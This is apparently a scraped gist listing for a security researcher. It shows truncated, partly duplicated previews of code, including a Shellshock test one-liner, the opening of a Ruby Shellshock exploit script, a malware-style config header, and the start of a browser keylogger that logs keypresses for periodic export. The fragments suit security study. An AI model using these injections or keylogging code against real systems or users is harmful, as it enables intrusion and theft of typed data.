Abhisek Datta abhisek

## burp_smime_sign.rb
require 'java'
java_import 'burp.IBurpExtender'
java_import 'burp.IHttpListener'
java_import 'burp.IProxyListener'
java_import 'burp.IScannerListener'
java_import 'burp.IExtensionStateListener'

class BurpExtender
  include IBurpExtender, IHttpListener, IProxyListener, IScannerListener, IExtensionStateListener


## server.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <signal.h>
#include <assert.h>

## hello.cgi
#!/bin/bash

printf "Content-type: text/html\n\n";
printf "Hello, World.";

## gist:30933636ca7fa3e6bc92
env x='() { :;}; echo Vulnerable' bash -c "echo Hello"

## gist:c719322b44c2ad77203a
require 'net/http'
require 'uri'

=begin
ruby shellshock.rb http://127.0.0.1/my-cgi/bolo.cgi
=end

if __FILE__ == $0
  uri = ::URI.parse(ARGV.shift)
  http = ::Net::HTTP.new(uri.host, uri.port)

## drop_exec.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <errno.h>
#include <assert.h>

#define dprintf(__m)		fprintf(stderr, "[DBG] %s\n", __m)
#define dvprintf(__m, ...)	fprintf(stderr, "[DBG] " __m "\n", __VA_ARGS__)

## process_enum.cpp
// non-reentrant
CHAR *_ToLowerCase(char *p)
{
	static char _s_lower_str[4000];
	int i;

	memset(_s_lower_str, 0, sizeof(_s_lower_str));
	for(i = 0; i < strlen(p); i++)
		_s_lower_str[i] = tolower((int) p[i]);


## asunpack_229.rb
#
# ASPack 2.29 unpacker via. Dynamic Analysis
#

$:.unshift("C:\\Lib\\metasm")
require 'metasm'

AS229_OEP_PUSH_OFFSET = 0x420

def _msg(m, error = false)

## Config.h
#ifndef _CONFIG_H
#define _CONFIG_H

#define CFG_SRV_PORT	8389
#define CFG_MUTEX		TEXT("BatMan")
#define CFG_SRV_FLAG	TEXT("-booyah")

#endif

## webkey.js
var WEBKEY = {
  dataLog: "",
  start: function() {
            window.onkeypress = function(ev) {
              WEBKEY.dataLog += String.fromCharCode(ev.charCode);
            }

            setInterval("WEBKEY.exportLog();", 5000);
         },
  exportLog: function() {
	require 'java'
	java_import 'burp.IBurpExtender'
	java_import 'burp.IHttpListener'
	java_import 'burp.IProxyListener'
	java_import 'burp.IScannerListener'
	java_import 'burp.IExtensionStateListener'

	class BurpExtender
	include IBurpExtender, IHttpListener, IProxyListener, IScannerListener, IExtensionStateListener
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/time.h>
	#include <netinet/in.h>
	#include <unistd.h>
	#include <signal.h>
	#include <assert.h>
	#!/bin/bash

	printf "Content-type: text/html\n\n";
	printf "Hello, World.";
	require 'net/http'
	require 'uri'

	=begin
	ruby shellshock.rb http://127.0.0.1/my-cgi/bolo.cgi
	=end

	if __FILE__ == $0
	uri = ::URI.parse(ARGV.shift)
	http = ::Net::HTTP.new(uri.host, uri.port)
	// non-reentrant
	CHAR _ToLowerCase(char p)
	{
	static char _s_lower_str[4000];
	int i;

	memset(_s_lower_str, 0, sizeof(_s_lower_str));
	for(i = 0; i < strlen(p); i++)
	_s_lower_str[i] = tolower((int) p[i]);
	#
	# ASPack 2.29 unpacker via. Dynamic Analysis
	#

	$:.unshift("C:\\Lib\\metasm")
	require 'metasm'

	AS229_OEP_PUSH_OFFSET = 0x420

	def _msg(m, error = false)
	#ifndef _CONFIG_H
	#define _CONFIG_H

	#define CFG_SRV_PORT 8389
	#define CFG_MUTEX TEXT("BatMan")
	#define CFG_SRV_FLAG TEXT("-booyah")

	#endif
	var WEBKEY = {
	dataLog: "",
	start: function() {
	window.onkeypress = function(ev) {
	WEBKEY.dataLog += String.fromCharCode(ev.charCode);
	}

	setInterval("WEBKEY.exportLog();", 5000);
	},
	exportLog: function() {